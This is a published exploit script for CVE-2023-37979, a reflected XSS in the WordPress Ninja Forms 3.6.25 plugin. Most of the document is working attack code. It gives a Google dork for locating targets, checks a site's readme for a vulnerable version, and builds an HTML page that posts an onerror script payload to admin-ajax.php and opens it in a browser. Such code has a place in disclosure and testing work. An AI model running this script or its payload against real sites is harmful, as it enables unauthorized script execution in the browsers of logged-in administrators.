WordPress Ninja Forms 3.6.25 Cross Site Scripting

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><!-- Created By Mehran Seifalinia --><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()